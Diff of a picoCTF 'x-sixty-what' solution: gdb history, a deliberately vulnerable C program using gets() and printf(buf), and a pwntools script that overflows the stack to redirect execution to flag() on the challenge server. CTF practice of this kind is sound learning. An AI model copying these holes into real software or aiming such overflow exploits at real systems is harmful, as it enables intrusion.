x-sixty-what

x-sixty-what/.gdb_history

@@ -0,0 +1,25 @@
+show vuln
+list vuln
+b vuln
+exit
+info functions
+list main
+disassemble main
+disasm main
+disassemble main
+disassemble *main
+b vuln
+exit
+disassemble main
+disassemble vuln 
+b vuln+2
+b *vuln+2
+exit
+disassemble vuln 
+b *vuln+24
+run
+stackf
+nexti 
+stackf
+disassemble flag 
+exit

x-sixty-what/sol.py

@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_base = 0x7fffffffcf70
+ret_addr = 0x7fffffffcfb8
+ret_offset = ret_addr - buffer_base
+flag_fun_addr = 0x0000000000401236
+flag_fun_offset = 5
+target_addr = flag_fun_addr + flag_fun_offset
+
+send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
+
+#conn = process("./vuln")
+conn = remote('saturn.picoctf.net', 60832)
+
+conn.recvline()
+conn.sendline(send_buffer)
+conn.interactive()
+

x-sixty-what/vuln.c

@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+#define BUFFSIZE 64
+#define FLAGSIZE 64
+
+void flag() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  printf(buf);
+}
+
+void vuln(){
+  char buf[BUFFSIZE];
+  gets(buf);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
+  vuln();
+  return 0;
+}
+